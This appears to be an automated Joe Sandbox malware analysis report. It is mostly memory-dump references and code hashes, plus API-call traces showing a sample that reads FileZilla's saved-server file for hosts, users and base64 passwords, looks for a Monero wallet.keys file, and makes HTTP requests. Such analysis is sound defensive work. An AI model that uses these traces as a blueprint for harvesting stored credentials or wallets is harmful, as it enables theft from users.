                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d0dcbab18ec4284ec34a5c32407e6b7425f473321a9dde194cdbbc869946cebb
                              • Instruction ID: f04fe5708cd6a70c895d54bb16da68d0d3e94522039edb6187ad5905e7f47ae8
                              • Opcode Fuzzy Hash: d0dcbab18ec4284ec34a5c32407e6b7425f473321a9dde194cdbbc869946cebb
                              • Instruction Fuzzy Hash: 1AD13BB46083808FD7148F15C0A472BBFE0FF95708F19895EE8D95B391D7BA8648DB92
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                              • Instruction ID: a7788a64adc73fc8a773c89ba4c90a16086e04874188e4336763d01d67bfdd5b
                              • Opcode Fuzzy Hash: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                              • Instruction Fuzzy Hash: 88B1AE72A083519BD308CF25C89136BF7E2FFC8314F1AC93EB89997290D774D9459A82
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                              • Instruction ID: 41b700d63d1031a376bd66c69618bf94e08d9fb17af8d012b9ac3d3f7fedf698
                              • Opcode Fuzzy Hash: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                              • Instruction Fuzzy Hash: 37B18F72A083155BD308CF25C89136BF7E2EFC8310F5AC93EB89997291D778D9459A82
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                              • Instruction ID: e2cf34481bf0e7595d59682c3c0c823355ad80b5ca2add1f06e3fab6561701b2
                              • Opcode Fuzzy Hash: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                              • Instruction Fuzzy Hash: 9BB10571A097158FD706EE39C481229F7E1FFE6280F51C72EF895A7662EB31E8818744
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                              • Instruction ID: 57bb4aa54c901cd20f0f26f07b37659a173faf8786a2f0cf28a00c9be80c4832
                              • Opcode Fuzzy Hash: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                              • Instruction Fuzzy Hash: 1991C271A002158BDF15EE68DC84BBAB3A4FF55304F294569ED18EB382D732ED05C7A2
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                              • Instruction ID: 3172aea37686111775f53f7babe86d0fea84bb7a6824e483efd174a6853639a5
                              • Opcode Fuzzy Hash: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                              • Instruction Fuzzy Hash: E5B138316106099FDB15DF2CC48AB657BA0FF45364F29869CE8DACF2A2C735E991CB40
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                              • Instruction ID: 63b33996941bd090c244aa0847840833ebc2eb0dc2e9ace4bfb713f3d56628f0
                              • Opcode Fuzzy Hash: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                              • Instruction Fuzzy Hash: C7C14A75A0471A8FC715DF28C08045AB3F2FF88354F258A6DE8999B721D731E996CF81
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                              • Instruction ID: 943f658617d28de939db92e2f1707197c83f9c294b7075260d681c89ae4529e5
                              • Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                              • Instruction Fuzzy Hash: 519159319287946AEB169B3CCC417AAB7A4FFE6350F14C72AF98CB2491FB71C5818345
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                              • Instruction ID: bffff7802fdd9095d8c66f4ceeb75dd81d8649919a23feef2429c94dde6c3cac
                              • Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                              • Instruction Fuzzy Hash: 85A11D72A10B19CBEB19CF55CCC1A9ABBB1FB58314F14C62AD41AE72A1D334A944CF94
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                              • Instruction ID: fc3a043a77c03877f96fb3a7a161a10fe421a0b180302328e1948953ceb7d4ef
                              • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                              • Instruction Fuzzy Hash: E1A17D72A083119BD308CF25C89075BF7E2FFC8714F1ACA3DA89997254D774E8449B82
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ce8163cc5956f9971a804b80d4d0244906c07c7741a1af60d572d615f20b6c46
                              • Instruction ID: 13d0bc27a775868065bcad125b0aa10a0c785944632c14ecab1dfbaba181476e
                              • Opcode Fuzzy Hash: ce8163cc5956f9971a804b80d4d0244906c07c7741a1af60d572d615f20b6c46
                              • Instruction Fuzzy Hash: 6951E3B36096009FE708AE39D88566ABBE9EFD8320F16893EE6C5C7744D6305844C756
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                              • Instruction ID: 569db6a0b3471a31f6794e0887e9b2fb5baffe5888b66b58baf79b54e2ae76d0
                              • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                              • Instruction Fuzzy Hash: B4516962E09BD985C7058B7944502EEBFB26FE6200F1E829EC4985B383D2359689C3E5
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 380e0c8eaabb946c4091138fbb96011b54c46bfa2104c0db0f4524317598c91e
                              • Instruction ID: dbe6ea673dcc1fb68734ba31be8e3ff619c0767e3db566da83de9017eed215e7
                              • Opcode Fuzzy Hash: 380e0c8eaabb946c4091138fbb96011b54c46bfa2104c0db0f4524317598c91e
                              • Instruction Fuzzy Hash: E4318BF36142080BE748592EDC55736B3DAEBD4320F2B063EDA46C7380EC79A90A4159
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                              • Instruction ID: 4d4380f719737e920eca18c290049424b63e8615d1407fedd07d3ef3da97591e
                              • Opcode Fuzzy Hash: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                              • Instruction Fuzzy Hash: E5D0C9716097114FC3688F1EB440946FAE8DBD8320715C53FA09AC3750C6B094418B54
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              APIs
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 00828F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00828F9B
                                • Part of subcall function 0082AC30: lstrcpy.KERNEL32(00000000,?), ref: 0082AC82
                                • Part of subcall function 0082AC30: lstrcat.KERNEL32(00000000), ref: 0082AC92
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                                • Part of subcall function 0082AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0082AAF6
                                • Part of subcall function 0081A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0081A13C
                                • Part of subcall function 0081A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0081A161
                                • Part of subcall function 0081A110: LocalAlloc.KERNEL32(00000040,?), ref: 0081A181
                                • Part of subcall function 0081A110: ReadFile.KERNEL32(000000FF,?,00000000,0081148F,00000000), ref: 0081A1AA
                                • Part of subcall function 0081A110: LocalFree.KERNEL32(0081148F), ref: 0081A1E0
                                • Part of subcall function 0081A110: CloseHandle.KERNEL32(000000FF), ref: 0081A1EA
                                • Part of subcall function 00828FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00828FE2
                              • GetProcessHeap.KERNEL32(00000000,000F423F,00830DBF,00830DBE,00830DBB,00830DBA), ref: 008204C2
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008204C9
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 008204E5
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00830DB7), ref: 008204F3
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 0082052F
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00830DB7), ref: 0082053D
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 00820579
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00830DB7), ref: 00820587
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 008205C3
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00830DB7), ref: 008205D5
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00830DB7), ref: 00820662
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00830DB7), ref: 0082067A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00830DB7), ref: 00820692
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00830DB7), ref: 008206AA
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 008206C2
                              • lstrcat.KERNEL32(?,profile: null), ref: 008206D1
                              • lstrcat.KERNEL32(?,url: ), ref: 008206E0
                              • lstrcat.KERNEL32(?,00000000), ref: 008206F3
                              • lstrcat.KERNEL32(?,00831770), ref: 00820702
                              • lstrcat.KERNEL32(?,00000000), ref: 00820715
                              • lstrcat.KERNEL32(?,00831774), ref: 00820724
                              • lstrcat.KERNEL32(?,login: ), ref: 00820733
                              • lstrcat.KERNEL32(?,00000000), ref: 00820746
                              • lstrcat.KERNEL32(?,00831780), ref: 00820755
                              • lstrcat.KERNEL32(?,password: ), ref: 00820764
                              • lstrcat.KERNEL32(?,00000000), ref: 00820777
                              • lstrcat.KERNEL32(?,00831790), ref: 00820786
                              • lstrcat.KERNEL32(?,00831794), ref: 00820795
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00830DB7), ref: 008207EE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: 964c49de0661a9251cce1d5ad406a56ce6484813b02b2ccdb0431777ebacc712
                              • Instruction ID: bf1ad2c3c0302c01b03eea2a92fb587d5a5476fc43683dbc5d7615eefa46d4cd
                              • Opcode Fuzzy Hash: 964c49de0661a9251cce1d5ad406a56ce6484813b02b2ccdb0431777ebacc712
                              • Instruction Fuzzy Hash: EED14F71900218ABCB08EBE8ED96EEE7339FF54700F408558F512F6195DF34AA85CB62
                              APIs
                                • Part of subcall function 0082AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0082AAF6
                                • Part of subcall function 00814800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00814889
                                • Part of subcall function 00814800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00814899
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00815A48
                              • StrCmpCA.SHLWAPI(?,015FE430), ref: 00815A63
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00815BE3
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,015FE4D0,00000000,?,015F9F78,00000000,?,00831B4C), ref: 00815EC1
                              • lstrlen.KERNEL32(00000000), ref: 00815ED2
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00815EE3
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00815EEA
                              • lstrlen.KERNEL32(00000000), ref: 00815EFF
                              • lstrlen.KERNEL32(00000000), ref: 00815F28
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00815F41
                              • lstrlen.KERNEL32(00000000,?,?), ref: 00815F6B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00815F7F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00815F9C
                              • InternetCloseHandle.WININET(00000000), ref: 00816000
                              • InternetCloseHandle.WININET(00000000), ref: 0081600D
                              • HttpOpenRequestA.WININET(00000000,015FE410,?,015FDAB8,00000000,00000000,00400100,00000000), ref: 00815C48
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                                • Part of subcall function 0082AC30: lstrcpy.KERNEL32(00000000,?), ref: 0082AC82
                                • Part of subcall function 0082AC30: lstrcat.KERNEL32(00000000), ref: 0082AC92
                              • InternetCloseHandle.WININET(00000000), ref: 00816017
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
